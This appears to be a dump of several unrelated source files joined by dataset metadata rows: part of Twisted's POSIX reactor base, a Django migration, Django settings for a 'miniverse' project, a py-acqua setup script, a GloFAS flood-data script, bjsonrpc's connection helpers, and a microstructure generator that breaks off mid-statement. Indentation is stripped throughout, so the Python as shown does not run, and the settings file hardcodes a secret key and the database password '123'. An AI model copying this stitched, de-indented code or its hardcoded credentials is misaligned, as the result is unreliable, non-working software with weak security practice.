try:
from twisted.internet import unix
unixEnabled = True
except ImportError:
unixEnabled = False
processEnabled = False
if platformType == 'posix':
from twisted.internet import fdesc
import process
processEnabled = True
if platform.isWindows():
try:
import win32process
processEnabled = True
except ImportError:
win32process = None
class _Win32Waker(log.Logger, styles.Ephemeral):
"""I am a workaround for the lack of pipes on win32.
I am a pair of connected sockets which can wake up the main loop
from another thread.
"""
disconnected = 0
def __init__(self, reactor):
"""Initialize.
"""
self.reactor = reactor
# Following select_trigger (from asyncore)'s example;
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.setsockopt(socket.IPPROTO_TCP, 1, 1)
server.bind(('127.0.0.1', 0))
server.listen(1)
client.connect(server.getsockname())
reader, clientaddr = server.accept()
client.setblocking(0)
reader.setblocking(0)
self.r = reader
self.w = client
self.fileno = self.r.fileno
def wakeUp(self):
"""Send a byte to my connection.
"""
try:
util.untilConcludes(self.w.send, 'x')
except socket.error, (err, msg):
if err != errno.WSAEWOULDBLOCK:
raise
def doRead(self):
"""Read some data from my connection.
"""
try:
self.r.recv(8192)
except socket.error:
pass
def connectionLost(self, reason):
self.r.close()
self.w.close()
class _UnixWaker(log.Logger, styles.Ephemeral):
"""This class provides a simple interface to wake up the event loop.
This is used by threads or signals to wake up the event loop.
"""
disconnected = 0
i = None
o = None
def __init__(self, reactor):
"""Initialize.
"""
self.reactor = reactor
self.i, self.o = os.pipe()
fdesc.setNonBlocking(self.i)
fdesc._setCloseOnExec(self.i)
fdesc.setNonBlocking(self.o)
fdesc._setCloseOnExec(self.o)
self.fileno = lambda: self.i
def doRead(self):
"""Read some bytes from the pipe.
"""
fdesc.readFromFD(self.fileno(), lambda data: None)
def wakeUp(self):
"""Write one byte to the pipe, and flush it.
"""
# We don't use fdesc.writeToFD since we need to distinguish
# between EINTR (try again) and EAGAIN (do nothing).
if self.o is not None:
try:
util.untilConcludes(os.write, self.o, 'x')
except OSError, e:
if e.errno != errno.EAGAIN:
raise
def connectionLost(self, reason):
"""Close both ends of my pipe.
"""
if not hasattr(self, "o"):
return
for fd in self.i, self.o:
try:
os.close(fd)
except IOError:
pass
del self.i, self.o
if platformType == 'posix':
_Waker = _UnixWaker
elif platformType == 'win32':
_Waker = _Win32Waker
class PosixReactorBase(_SignalReactorMixin, ReactorBase):
"""
A basis for reactors that use file descriptors.
"""
implements(IReactorArbitrary, IReactorTCP, IReactorUDP, IReactorMulticast)
def __init__(self):
ReactorBase.__init__(self)
if self.usingThreads or platformType == "posix":
self.installWaker()
def _disconnectSelectable(self, selectable, why, isRead, faildict={
error.ConnectionDone: failure.Failure(error.ConnectionDone()),
error.ConnectionLost: failure.Failure(error.ConnectionLost())
}):
"""
Utility function for disconnecting a selectable.
Supports half-close notification, isRead should be boolean indicating
whether error resulted from doRead().
"""
self.removeReader(selectable)
f = faildict.get(why.__class__)
if f:
if (isRead and why.__class__ == error.ConnectionDone
and IHalfCloseableDescriptor.providedBy(selectable)):
selectable.readConnectionLost(f)
else:
self.removeWriter(selectable)
selectable.connectionLost(f)
else:
self.removeWriter(selectable)
selectable.connectionLost(failure.Failure(why))
def installWaker(self):
"""
Install a `waker' to allow threads and signals to wake up the IO thread.
We use the self-pipe trick (http://cr.yp.to/docs/selfpipe.html) to wake
the reactor. On Windows we use a pair of sockets.
"""
if not self.waker:
self.waker = _Waker(self)
self._internalReaders.add(self.waker)
self.addReader(self.waker)
# IReactorProcess
def spawnProcess(self, processProtocol, executable, args=(),
env={}, path=None,
uid=None, gid=None, usePTY=0, childFDs=None):
args, env = self._checkProcessArgs(args, env)
if platformType == 'posix':
if usePTY:
if childFDs is not None:
raise ValueError("Using childFDs is not supported with usePTY=True.")
return process.PTYProcess(self, executable, args, env, path,
processProtocol, uid, gid, usePTY)
else:
return process.Process(self, executable, args, env, path,
processProtocol, uid, gid, childFDs)
elif platformType == "win32":
if uid is not None or gid is not None:
raise ValueError("The uid and gid parameters are not supported on Windows.")
if usePTY:
raise ValueError("The usePTY parameter is not supported on Windows.")
if childFDs:
raise ValueError("Customizing childFDs is not supported on Windows.")
if win32process:
from twisted.internet._dumbwin32proc import Process
return Process(self, processProtocol, executable, args, env, path)
else:
raise NotImplementedError, "spawnProcess not available since pywin32 is not installed."
else:
raise NotImplementedError, "spawnProcess only available on Windows or POSIX."
# IReactorUDP
def listenUDP(self, port, protocol, interface='', maxPacketSize=8192):
"""Connects a given L{DatagramProtocol} to the given numeric UDP port.
@returns: object conforming to L{IListeningPort}.
"""
p = udp.Port(port, protocol, interface, maxPacketSize, self)
p.startListening()
return p
def connectUDP(self, remotehost, remoteport, protocol, localport=0,
interface='', maxPacketSize=8192):
"""DEPRECATED.
Connects a L{ConnectedDatagramProtocol} instance to a UDP port.
"""
warnings.warn("use listenUDP and then transport.connect().", DeprecationWarning, stacklevel=2)
p = udp.ConnectedPort((remotehost, remoteport), localport, protocol, interface, maxPacketSize, self)
p.startListening()
return p
# IReactorMulticast
def listenMulticast(self, port, protocol, interface='', maxPacketSize=8192, listenMultiple=False):
"""Connects a given DatagramProtocol to the given numeric UDP port.
EXPERIMENTAL.
@returns: object conforming to IListeningPort.
"""
p = udp.MulticastPort(port, protocol, interface, maxPacketSize, self, listenMultiple)
p.startListening()
return p
# IReactorUNIX
def connectUNIX(self, address, factory, timeout=30, checkPID=0):
"""@see: twisted.internet.interfaces.IReactorUNIX.connectUNIX
"""
assert unixEnabled, "UNIX support is not present"
c = unix.Connector(address, factory, timeout, self, checkPID)
c.connect()
return c
_unspecified = object()
def _checkMode(self, name, mode):
"""
Check C{mode} to see if a value was specified for it and emit a
deprecation warning if so. Return the default value if none was
specified, otherwise return C{mode}.
"""
if mode is not self._unspecified:
warnings.warn(
'The mode parameter of %(name)s will be removed. Do not pass '
'a value for it. Set permissions on the containing directory '
'before calling %(name)s, instead.' % dict(name=name),
category=DeprecationWarning,
stacklevel=3)
else:
mode = 0666
return mode
def listenUNIX(self, address, factory, backlog=50, mode=_unspecified,
wantPID=0):
"""
@see: twisted.internet.interfaces.IReactorUNIX.listenUNIX
"""
assert unixEnabled, "UNIX support is not present"
mode = self._checkMode('IReactorUNIX.listenUNIX', mode)
p = unix.Port(address, factory, backlog, mode, self, wantPID)
p.startListening()
return p
# IReactorUNIXDatagram
def listenUNIXDatagram(self, address, protocol, maxPacketSize=8192,
mode=_unspecified):
"""
Connects a given L{DatagramProtocol} to the given path.
EXPERIMENTAL.
@returns: object conforming to L{IListeningPort}.
"""
assert unixEnabled, "UNIX support is not present"
mode = self._checkMode('IReactorUNIXDatagram.listenUNIXDatagram', mode)
p = unix.DatagramPort(address, protocol, maxPacketSize, mode, self)
p.startListening()
return p
def connectUNIXDatagram(self, address, protocol, maxPacketSize=8192,
mode=_unspecified, bindAddress=None):
"""
Connects a L{ConnectedDatagramProtocol} instance to a path.
EXPERIMENTAL.
"""
assert unixEnabled, "UNIX support is not present"
mode = self._checkMode('IReactorUNIXDatagram.connectUNIXDatagram', mode)
p = unix.ConnectedDatagramPort(address, protocol, maxPacketSize, mode, bindAddress, self)
p.startListening()
return p
# IReactorTCP
def listenTCP(self, port, factory, backlog=50, interface=''):
"""@see: twisted.internet.interfaces.IReactorTCP.listenTCP
"""
p = tcp.Port(port, factory, backlog, interface, self)
p.startListening()
return p
def connectTCP(self, host, port, factory, timeout=30, bindAddress=None):
"""@see: twisted.internet.interfaces.IReactorTCP.connectTCP
"""
c = tcp.Connector(host, port, factory, timeout, bindAddress, self)
c.connect()
return c
# IReactorSSL (sometimes, not implemented)
def connectSSL(self, host, port, factory, contextFactory, timeout=30, bindAddress=None):
"""@see: twisted.internet.interfaces.IReactorSSL.connectSSL
"""
assert sslEnabled, "SSL support is not present"
c = ssl.Connector(host, port, factory, contextFactory, timeout, bindAddress, self)
c.connect()
return c
def listenSSL(self, port, factory, contextFactory, backlog=50, interface=''):
"""@see: twisted.internet.interfaces.IReactorSSL.listenSSL
"""
assert sslEnabled, "SSL support is not present"
p = ssl.Port(port, factory, contextFactory, backlog, interface, self)
p.startListening()
return p
# IReactorArbitrary
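# listenWith/connectWith instantiate an arbitrary port/connector type, inject
# this reactor via the 'reactor' keyword argument, and start it; they are the
# generic hooks behind IReactorArbitrary.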
def listenWith(self, portType, *args, **kw):
kw['reactor'] = self
p = portType(*args, **kw)
p.startListening()
return p
def connectWith(self, connectorType, *args, **kw):
kw['reactor'] = self
c = connectorType(*args, **kw)
c.connect()
return c
def _removeAll(self, readers, writers):
"""
Remove all readers and writers, and return the list of removed L{IReadDescriptor}s
and L{IWriteDescriptor}s.
Meant for calling from subclasses, to implement removeAll, like::
def removeAll(self):
return self._removeAll(self._reads, self._writes)
where C{self._reads} and C{self._writes} are iterables.
"""
removedReaders = set(readers) - self._internalReaders
for reader in removedReaders:
self.removeReader(reader)
removedWriters = set(writers)
for writer in removedWriters:
self.removeWriter(writer)
return list(removedReaders | removedWriters)
if sslEnabled:
classImplements(PosixReactorBase, IReactorSSL)
if unixEnabled:
classImplements(PosixReactorBase, IReactorUNIX, IReactorUNIXDatagram)
if processEnabled:
classImplements(PosixReactorBase, IReactorProcess)
__all__ = ["PosixReactorBase"]
|
gpl-3.0
| 8,697,282,309,824,158,000
| 32.147887
| 108
| 0.622477
| false
| 4.241814
| false
| false
| false
|
unfoldingWord-dev/uwadmin
|
uwadmin/migrations/0005_auto_20150524_1534.py
|
1
|
1202
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('uwadmin', '0004_auto_20150318_0034'),
]
operations = [
migrations.AddField(
model_name='publishrequest',
name='approved_at',
field=models.DateTimeField(default=None, null=True, db_index=True, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='publishrequest',
name='source_text',
field=models.ForeignKey(related_name='source_publish_requests', to='uwadmin.LangCode', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='publishrequest',
name='source_version',
field=models.CharField(max_length=10, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='publishrequest',
name='language',
field=models.ForeignKey(related_name='publish_requests', to='uwadmin.LangCode'),
preserve_default=True,
),
]
|
mit
| 8,915,345,621,021,246,000
| 30.631579
| 110
| 0.583195
| false
| 4.386861
| false
| false
| false
|
IQSS/miniverse
|
miniverse/settings/local_with_routing.py
|
1
|
6078
|
"""
Settings template for running two databases:
- Existing Dataverse databases (we only read it)
- Second database for Django core apps + Miniverse apps
Please read through and change the settings where noted
"""
from __future__ import absolute_import
import sys
from os import makedirs, environ
from os.path import join, isdir
from miniverse.testrunners.disable_migrations import DisableMigrations
from miniverse.settings.base import *
# -----------------------------------
# DEBUG
# - True: Dataverse Key required for API
# - Includes SQL for many of the API call results
# -----------------------------------
DEBUG = True #True False
# -----------------------------------
# TIME_ZONE
# -----------------------------------
TIME_ZONE = 'America/New_York'
# -----------------------------------
# Secret key
# -----------------------------------
SECRET_KEY = 'DEV-j94xnz*dj5f@_6-gt@ov)yjbcx0uagb7sv9a0j-(jo)j%m$el%'
# -----------------------------------
# Metrics cache settings
# -----------------------------------
METRICS_CACHE_VIEW = False
METRICS_CACHE_VIEW_TIME = 60 * 60 * 2 # Cache for visualizations
METRICS_CACHE_API_TIME = 60 * 15 # Cache for API endpoints
# -----------------------------------
# For local runs, this directory will include:
# - static files (after running 'collectstatic')
# - optional, sqlite db if that's used for the Django apps db
# -----------------------------------
LOCAL_SETUP_DIR = join(PROJECT_ROOT, 'test_setup')
if not isdir(LOCAL_SETUP_DIR):
makedirs(LOCAL_SETUP_DIR)
# -----------------------------------
# Database routing.
# e.g. between the Dataverse db and Django db
# -----------------------------------
DATABASE_ROUTERS = ['miniverse.db_routers.db_dataverse_router.DataverseRouter',]
# -----------------------------------
# URL of the Dataverse db being read
# -----------------------------------
#DATAVERSE_INSTALLATION_URL = 'https://demo.dataverse.org'
#DATAVERSE_INSTALLATION_URL = 'https://dataverse.harvard.edu'
DATAVERSE_INSTALLATION_URL = 'http://localhost:8080'
# -----------------------------------
# Database Setup
# - default -> Create a new db for the django/miniverse specific apps
# - May be any relational db type: postgres, sqlite, etc
# - dataverse -> Read-only users for the Dataverse Posgres db
# -----------------------------------
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': join(LOCAL_SETUP_DIR, 'miniverse_default.db3'),
},
'dataverse': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dvndb', # dvndb_demo, dvn_thedata, dvndb
'USER': 'postgres', # Set to a read-only user
'PASSWORD': '123',
'HOST': 'localhost',
'TEST': {
'MIRROR': 'default', # For running tests, only create 1 db
},
}
}
# -----------------------------------
# Need when running DEBUG = False
# -----------------------------------
ALLOWED_HOSTS = ('127.0.0.1', 'dd7be506.ngrok.io')
# -----------------------------------
# Need to set when RestrictAdminMiddleware is active
# -----------------------------------
INTERNAL_IPS = ('127.0.0.1',)
# -----------------------------------
# Slackbot
# -----------------------------------
SLACK_USERNAME = 'dvbot'
SLACK_BOT_TOKEN = environ.get('SLACK_BOT_TOKEN')
BOT_ID = environ.get('BOT_ID')
SLACK_WEBHOOK_SECRET = environ.get('SLACK_WEBHOOK_SECRET')
# -----------------------------------
# Optional MIDDLEWARE_CLASSES
# -----------------------------------
MIDDLEWARE_CLASSES += [
# Restrict by IP address
#'dv_apps.admin_restrict.middleware.RestrictAdminMiddleware',
# Email about broken 404s
#'django.middleware.common.BrokenLinkEmailsMiddleware',
]
# -----------------------------------
# cookie name
# -----------------------------------
SESSION_COOKIE_NAME = 'dv_metrics'
# -----------------------------------
# Where static files are collected
# -----------------------------------
STATIC_ROOT = join(LOCAL_SETUP_DIR, 'staticfiles')
if not isdir(STATIC_ROOT):
makedirs(STATIC_ROOT)
# -----------------------------------
# Django Debug TOOLBAR CONFIGURATION
# -----------------------------------
# See: http://django-debug-toolbar.readthedocs.org/en/latest/installation.html#explicit-setup
# -----------------------------------
INSTALLED_APPS += (
'debug_toolbar',
'django.contrib.admindocs',
)
MIDDLEWARE_CLASSES += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
DEBUG_TOOLBAR_PATCH_SETTINGS = False
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
# -----------------------------------
# For running tests:
# - Only create 1 test database it has to be a Postgres db
# - Remove the Database routing
# - Disable migrations. e.g., We don't want to run them
# - Set a new TEST_RUNNER:
# - We want to *create* unmanaged tables in the test db
# - Disable timezone awareness for fixture loading
# -----------------------------------
if 'test' in sys.argv or 'test_coverage' in sys.argv: # Covers regular testing and django-coverage
DATABASES['default']['ENGINE'] = 'django.db.backends.postgresql_psycopg2'
DATABASES['default']['HOST'] = 'localhost'
DATABASES['default']['USER'] = 'postgres'
DATABASES['default']['PASSWORD'] = '123'
# The custom routers we're using to route certain ORM queries
# to the remote host conflict with our overridden db settings.
# Set DATABASE_ROUTERS to an empty list to return to the defaults
# during the test run.
DATABASE_ROUTERS = []
MIGRATION_MODULES = DisableMigrations()
# Set Django's test runner a custom class that will create
# 'unmanaged' tables
TEST_RUNNER = 'miniverse.testrunners.managed_model_test_runner.ManagedModelTestRunner'
# Disable timezone awareness to False to avoid warnings when loading fixtures
# e.g. to avoid: RuntimeWarning: (some object)received a naive datetime (2016-08-16
# 09:25:41.349000) while time zone support is active.
USE_TZ = False
|
mit
| 906,195,234,186,292,000
| 33.534091
| 99
| 0.557585
| false
| 3.980354
| true
| false
| false
|
sanluca/py-acqua
|
setup.py
|
1
|
1902
|
# -*- coding: iso-8859-15 -*-
#Copyright (C) 2005, 2008 Py-Acqua
#http://www.pyacqua.net
#email: info@pyacqua.net
#
#
#Py-Acqua is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
#Py-Acqua is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Py-Acqua; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import sys
import glob
from distutils.core import setup
###
def moon_walk (root_dir, repl):
packages, data_files = [], []
for dirpath, dirnames, filenames in os.walk (root_dir):
for i, dirname in enumerate (dirnames):
if dirname.startswith('.'): del dirnames[i]
data_files.append(("share/pyacqua/" + repl + dirpath[len(root_dir):], [os.path.join(dirpath, f) for f in filenames]))
return data_files
if __name__ != "__main__":
print moon_walk (sys.argv[1], "")
else:
setup (
name="py-acqua",
version="1.0",
description="PyAcqua program",
author="Francesco Piccinno",
author_email="stack.box@gmail.com",
url="http://pyacqua.altervista.org",
scripts=["src/acqua.py"],
package_dir={'pyacqua': 'src'},
packages=['pyacqua'],
data_files=moon_walk ("skins", "skins") + moon_walk ("locale", "locale") + [
#("src", glob.glob ("src/*")),
("share/pyacqua/plugins", glob.glob ("plugins/*.py")),
("share/pyacqua/pixmaps", glob.glob ("pixmaps/*")),
("share/pyacqua/tips", ["src/tip_of_the_day_en.txt", "src/tip_of_the_day.txt"])
]
)
|
gpl-2.0
| 8,070,389,984,959,156,000
| 32.368421
| 120
| 0.679811
| false
| 3.05297
| false
| false
| false
|
bhermansyah/DRR-datacenter
|
scripts/misc-boedy1996/glofas_refactor.py
|
1
|
6276
|
import os, sys
os.environ.setdefault("DJANGO_SETTINGS_MODULE","geonode.settings")
import csv
from django.db import connection, connections
from django.conf import settings
from geodb.models import Glofasintegrated, AfgBasinLvl4GlofasPoint
from netCDF4 import Dataset, num2date
import numpy as np
from django.contrib.gis.geos import Point
def getRefactorData():
# f_IN = open("/Users/budi/Documents/iMMAP/DRR-datacenter/scripts/misc-boedy1996/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
f_IN = open("/home/ubuntu/Glofas_Baseline_Output_Adjustment_factor.csv", 'rU')
reader = csv.reader(f_IN)
first = True
data = {}
for row in reader:
if first:
first = False
else:
lon = row[2]
lat = row[1]
# data[lat][lon]['rl2_factor']=row[8]
data[lat]={lon:{'rl2_factor':row[8],'rl5_factor':row[9],'rl20_factor':row[10]}}
f_IN.close()
# print data['67.75']['31.85']
return data
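# The CSV supplies per-coordinate adjustment factors for the 2-, 5- and 20-year
# return levels; calculate_glofas_params below looks them up as
# refactor[str(lat)][str(lon)] and falls back to the raw rl values when a
# coordinate is missing.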
def calculate_glofas_params(date):
date_arr = date.split('-')
filename = getattr(settings, 'GLOFAS_NC_FILES')+date_arr[0]+date_arr[1]+date_arr[2]+"00.nc"
# print Glofasintegrated.objects.latest('datadate').date
nc = Dataset(filename, 'r', Format='NETCDF4')
# get coordinates variables
lats = nc.variables['lat'][:]
lons = nc.variables['lon'][:]
rl2s= nc.variables['rl2'][:]
rl5s= nc.variables['rl5'][:]
rl20s= nc.variables['rl20'][:]
times = nc.variables['time'][:]
essemble = nc.variables['ensemble'][:]
# convert date, how to store date only strip away time?
# print "Converting Dates"
units = nc.variables['time'].units
dates = num2date (times[:], units=units, calendar='365_day')
d = np.array(nc.variables['dis'])
# header = ['Latitude', 'Longitude', 'rl2', 'rl5', 'rl20', 'rl2_dis_percent', 'rl2_avg_dis_percent', 'rl5_dis_percent', 'rl5_avg_dis_percent', 'rl20_dis_percent', 'rl20_avg_dis_percent']
times_index=[]
for i,j in enumerate(times):
times_index.append(i)
coord_index = 0
refactor = getRefactorData()
for lat, lon, rl2, rl5, rl20 in zip(lats, lons, rl2s, rl5s, rl20s):
# print str(lat), str(lon)
try:
# print refactor[str(lat)][str(lon)]
rl2_temp = rl2*float(refactor[str(lat)][str(lon)]['rl2_factor'])
rl5_temp = rl5*float(refactor[str(lat)][str(lon)]['rl5_factor'])
rl20_temp = rl20*float(refactor[str(lat)][str(lon)]['rl20_factor'])
except:
rl2_temp = rl2
rl5_temp = rl5
rl20_temp = rl20
rl2 = rl2_temp
rl5 = rl5_temp
rl20 = rl20_temp
# print rl2,rl5,rl20, refactor[str(lat)][str(lon)]['rl2_factor']
data_in = []
data_in.append(lat)
data_in.append(lon)
data_in.append(rl2)
data_in.append(rl5)
data_in.append(rl20)
rl2_dis_percent = []
rl5_dis_percent = []
rl20_dis_percent = []
rl2_avg_dis = []
rl5_avg_dis = []
rl20_avg_dis = []
for i in times_index:
data = d[i,:,coord_index]
dis_data = []
for l in data:
dis_data.append(l)
dis_avg = np.median(dis_data)
count = sum(1 for x in data if x>rl2)
percent_rl2 = round(float(count)/float(51)*100)
rl2_avg_dis.append(round(float(dis_avg)/float(rl2)*100))
rl2_dis_percent.append(percent_rl2)
count = sum(1 for x in data if x>rl5)
percent_rl5 = round(float(count)/float(51)*100)
rl5_avg_dis.append(round(float(dis_avg)/float(rl5)*100))
rl5_dis_percent.append(percent_rl5)
count = sum(1 for x in data if x>rl20)
percent_rl20 = round(float(count)/float(51)*100)
rl20_avg_dis.append(round(float(dis_avg)/float(rl20)*100))
rl20_dis_percent.append(percent_rl20)
if i>=19:
break
# print rl2_avg_dis
data_in.append(max(rl2_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl2_dis_percent):
if item == max(rl2_dis_percent):
# print index, item
temp_avg_dis.append(rl2_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl2_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl5_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl5_dis_percent):
if item == max(rl5_dis_percent):
# print index, item
temp_avg_dis.append(rl5_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl5_avg_dis_percent = max(temp_avg_dis)
data_in.append(max(rl20_dis_percent))
temp_avg_dis=[]
for index, item in enumerate(rl20_dis_percent):
if item == max(rl20_dis_percent):
# print index, item
temp_avg_dis.append(rl20_avg_dis[index])
data_in.append(max(temp_avg_dis))
rl20_avg_dis_percent = max(temp_avg_dis)
if coord_index>2035 and max(rl2_dis_percent)>=25:
pnt = Point(round(float(lon),2), round(float(lat),2), srid=4326)
checkdata = AfgBasinLvl4GlofasPoint.objects.filter(geom__intersects=pnt)
for z in checkdata:
p = Glofasintegrated(basin_id=z.value, datadate=date, lon=lon, lat=lat, rl2=rl2, rl5=rl5, rl20=rl20, rl2_dis_percent=max(rl2_dis_percent), rl2_avg_dis_percent=rl2_avg_dis_percent, rl5_dis_percent=max(rl5_dis_percent), rl5_avg_dis_percent=rl5_avg_dis_percent, rl20_dis_percent=max(rl20_dis_percent), rl20_avg_dis_percent=rl20_avg_dis_percent)
p.save()
print coord_index, z.value
coord_index = coord_index+1
# print data_in
# print Glofasintegrated.objects.filter(datadate=date).count()
# if Glofasintegrated.objects.filter(datadate=date).count() == 0 :
# Glofasintegrated(datadate=date).save()
nc.close()
Glofasintegrated.objects.filter(datadate='2017-04-13').delete()
calculate_glofas_params('2017-04-13')
# px = Glofasintegrated.objects.order_by().values('datadate').distinct()
# for i in px:
# print str(i['datadate'])
# Glofasintegrated.objects.filter(datadate=i['datadate']).delete()
# calculate_glofas_params(str(i['datadate']))
|
gpl-3.0
| 6,982,054,730,688,295,000
| 33.108696
| 357
| 0.605003
| false
| 2.949248
| false
| false
| false
|
deavid/bjsonrpc
|
bjsonrpc/main.py
|
1
|
2824
|
"""
bjson/main.py
Copyright (c) 2010 David Martinez Marti
All rights reserved.
Licensed under 3-clause BSD License.
See LICENSE.txt for the full license text.
"""
import socket
import bjsonrpc.server
import bjsonrpc.connection
import bjsonrpc.handlers
__all__ = [
"createserver",
"connect",
]
def createserver(host="127.0.0.1", port=10123,
handler_factory=bjsonrpc.handlers.NullHandler,
sock=None, http=False):
"""
Creates a *bjson.server.Server* object linked to a listening socket.
Parameters:
**host**
Address (IP or Host Name) to listen to as in *socket.bind*.
Use "0.0.0.0" to listen to all address. By default this points to
127.0.0.1 to avoid security flaws.
**port**
Port number to bind the socket. In Unix, port numbers less
than 1024 requires special permissions.
**handler_factory**
Class to instantiate to publish remote functions.
**(return value)**
A *bjson.server.Server* instance or raises an exception.
Servers are usually created this way::
import bjsonrpc
server = bjsonrpc.createserver("0.0.0.0")
server.serve()
Check :ref:`bjsonrpc.server` documentation
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen(3)
return bjsonrpc.server.Server(sock, handler_factory=handler_factory, http=http)
def connect(host="127.0.0.1", port=10123,
sock=None, handler_factory=bjsonrpc.handlers.NullHandler):
"""
Creates a *bjson.connection.Connection* object linked to a connected
socket.
Parameters:
**host**
Address (IP or Host Name) to connect to.
**port**
Port number to connect to.
**handler_factory**
Class to instantiate to publish remote functions to the server.
By default this is *NullHandler* which means that no functions are
executable by the server.
**(return value)**
A *bjson.connection.Connection* instance or raises an exception.
Connections are usually created this way::
import bjsonrpc
conn = bjsonrpc.connect("rpc.host.net")
print conn.call.some_method_in_server_side()
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
return bjsonrpc.connection.Connection(sock, handler_factory=handler_factory)
|
bsd-3-clause
| 5,525,710,750,083,788,000
| 29.042553
| 83
| 0.596671
| false
| 4.246617
| false
| false
| false
|
Micket/CCBuilder
|
make_cc.py
|
1
|
8680
|
#!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
import argparse
import pickle
import time
import CCBuilder as ccb
import CCBuilder_c as ccb_c
import numpy as np
import scipy.special
def uniform_dist(x):
""" Returns uniform distributions of given range """
return lambda: np.random.uniform(x[0], x[1])
def weibull_dist(a, mu):
""" Returns Weibull distributions for given shape parameter and average """
return lambda: np.random.weibull(a) * mu / scipy.special.gamma(1/a + 1)
def parse_dist(arg):
# Parses input string for given distribution.
# Returns a distribution, and the average
d, params = arg.split(':')
params = [float(x) for x in params.split(',')]
if d == 'U':
return uniform_dist(params), np.mean(params)
elif d == 'W':
a, mu = params
return weibull_dist(a, mu), mu
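# Illustrative examples of the distribution syntax handled by parse_dist:
#   parse_dist('U:0.1,0.4') -> (uniform sampler on [0.1, 0.4], mean 0.25)
#   parse_dist('W:1.2,0.8') -> (Weibull sampler with shape a=1.2, mean 0.8)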
parser = argparse.ArgumentParser(description='''Generate a WC microstructure.
Grain shape/size supports 2 types of distributions:
Uniform: U:low,high
Weibull: W:a,mu (a=k in some notation, mu=mean)
''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument('-V', dest='verbose', action='store_true', help='Verbose mode.')
parser.add_argument('-f', dest='fname', metavar='basename', required=True, help='Output base filename.')
parser.add_argument('-L', dest='L', metavar='length', required=True, type=float, help='Cell length (volume is L^3)')
parser.add_argument('-m', dest='m', metavar='m', required=True, type=int,
help='Grid resolution. Total number of voxels are (m*L)^3')
parser.add_argument('--vol_frac_goal', dest="vol_frac_goal", metavar='v', required=True, type=float,
help='Goal for volume fraction WC (excluding overlap)')
parser.add_argument('-s', dest='seed', metavar='s', default=None, type=int,
help='Seed for RNG. Given identical parameters, ' +
'CCBuilder will generate identical output given a controlled seed.')
parser.add_argument('--stray_cleanup', action='store_true', help='Clean up stray voxels')
group = parser.add_argument_group('WC grain shape')
group.add_argument('-k', dest='k_dist', metavar='type,[params]', default='U:0.4,1.4',
help='k distribution')
group.add_argument('-r', dest='r_dist', metavar='type,[params]', default='U:0.1,0.4',
help='r distribution')
group.add_argument('-d', dest='d_dist', metavar='type,[params]', default='U:0.5,1.5',
help='d distribution')
group = parser.add_argument_group('Packing')
group.add_argument('--use_potential', action='store_true', help='Use repulsive potential.')
group.add_argument('--nr_tries', dest='nr_tries', metavar='n', default=2500, type=int,
help='Number of random translations.')
group.add_argument('--delta', dest='delta', metavar='d', type=float,
help='Maximum distance for randomized translations.')
group.add_argument('--m_coarse', dest="m_coarse", metavar='mc', default=10,
help='Grid resolution during packing.')
group = parser.add_argument_group('Potts simulation')
group.add_argument('--mc_steps', dest="mc_steps", metavar='steps', default=0.05, type=float,
help='Monte-Carlo steps (scales with (m*L)^4. Set to zero to turn off.')
group.add_argument('--tau', dest='tau', metavar='t', default=0.5, type=float,
help='Ficticious temperature in Potts model.')
options = parser.parse_args()
if options.seed is not None:
np.random.seed(options.seed)
# Heuristic mapping from actual to goal volume fraction
# vol_frac_goal = (alpha - 2)/(2 * alpha) + 1/alpha * np.sqrt(1 - alpha * np.log(-2*(vol_frac - 1)))
d_eq, d_0 = parse_dist(options.d_dist)
r, r_0 = parse_dist(options.r_dist)
k, k_0 = parse_dist(options.k_dist)
fname = options.fname
# to avoid confusion with types:
m = np.int(options.m)
m_coarse = np.int(options.m_coarse)
L = np.float(options.L)
mc_steps = np.float(options.mc_steps)
vol_frac_goal = np.double(options.vol_frac_goal)
tau = np.double(options.tau)
nr_tries = np.int(options.nr_tries)
delta_x = d_0/float(m)
M = np.int(m * L / d_0)
M_coarse = np.int(m_coarse * L / d_0)
idelta = M
idelta_coarse = M_coarse
if options.delta:
idelta = np.int(M * options.delta / L)
idelta_coarse = np.int(M_coarse * options.delta / L)
trunc_triangles = ccb.prepare_triangles(vol_frac_goal, L, r, k, d_eq)
# trunc_triangles = trunc_triangles[:1]
# trunc_triangles[0].rot_matrix = np.eye(3)
# trunc_triangles[0].rot_matrix_tr = np.eye(3)
# trunc_triangles[0].midpoint = np.array([2., 2., 2.])
# Sort triangles w.r.t. volume, so that large triangles are added to the box first (better packing)
trunc_triangles.sort(key=lambda x: x.volume, reverse=True)
print('Prepared', len(trunc_triangles), 'triangles')
if options.use_potential:
ccb.optimize_midpoints(L, trunc_triangles)
if m_coarse == m:
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, nr_tries, idelta, 1.0)
else:
